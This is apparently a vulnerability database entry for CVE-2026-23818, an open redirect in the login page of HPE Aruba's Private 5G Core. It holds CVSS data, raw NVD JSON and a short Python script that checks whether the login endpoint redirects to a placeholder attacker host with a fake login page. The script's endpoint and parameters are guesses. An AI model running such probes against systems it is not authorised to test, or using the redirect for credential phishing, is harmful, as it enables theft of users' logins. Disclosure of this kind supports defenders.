Security Vulnerability Report
CVE-2026-23818 CVSS 8.8 HIGH

CVE-2026-23818

Published: 2026-04-07 13:16:46
Last Modified: 2026-04-14 21:15:03

Description

A vulnerability has been identified in the graphical user interface (GUI) of HPE Aruba Networking Private 5G Core On-Prem that could allow an attacker to abuse an open redirect vulnerability in the login flow using a crafted URL. Successful exploitation may redirect an authenticated user to an attacker-controlled server hosting a spoofed login page prompting the unsuspecting victim to give away their credentials, which could then be captured by the attacker, before being redirected back to the legitimate login page.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hpe:aruba_networking_private_5g_core:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Networking Private 5G Core On-Prem (for the specific affected versions, refer to the official HPE advisory hpesbnw05032en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-23818 Open Redirect Vulnerability
# Target: HPE Aruba Networking Private 5G Core On-Prem
import requests


def check_open_redirect(target_base_url, malicious_redirect_url):
    """
    Tests if the login endpoint accepts arbitrary redirect URLs.
    """
    # Vulnerable endpoint assumption based on description
    login_endpoint = f"{target_base_url}/login"

    # Payload attempting to redirect to an external attacker-controlled server
    params = {
        "redirect": malicious_redirect_url,
        "next": malicious_redirect_url,  # Common parameter name for redirects
    }

    try:
        print(f"[*] Sending request to: {login_endpoint}")
        response = requests.get(login_endpoint, params=params, allow_redirects=False)
    except requests.RequestException as exc:
        # Connection or TLS failure: nothing can be concluded about the endpoint
        print(f"[-] Request failed: {exc}")
        return False

    # Check if the response contains a 302/301 Redirect location
    if response.status_code in [301, 302, 303, 307, 308]:
        # Location may be absent, so default to "" to keep the membership test safe
        location = response.headers.get("Location", "")
        if malicious_redirect_url in location:
            print(f"[!] Vulnerability Confirmed! Redirecting to: {location}")
            return True

    print("[*] No open redirect detected or parameter name is different.")
    return False


if __name__ == "__main__":
    target = "https://<target-ip>:<port>"
    evil_site = "http://attacker-controlled-server.com/fake-login"
    check_open_redirect(target, evil_site)

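References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05032en_us&docLocale=en_US (Vendor Advisory)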

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23818", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:45.587", "lastModified": "2026-04-14T21:15:02.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in the graphical user interface (GUI) of HPE Aruba Networking Private 5G Core On-Prem that could allow an attacker to abuse an open redirect vulnerability in the login flow using a crafted URL. Successful exploitation may redirect an authenticated user to an attacker-controlled server hosting a spoofed login page prompting the unsuspecting victim to give away their credentials, which could then be captured by the attacker, before being redirected back to the legitimate login page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:hpe:aruba_networking_private_5g_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.25.3.1", "matchCriteriaId": "B5188B9C-7E4A-456B-A8BF-FC9AFE4AE95F"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05032en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}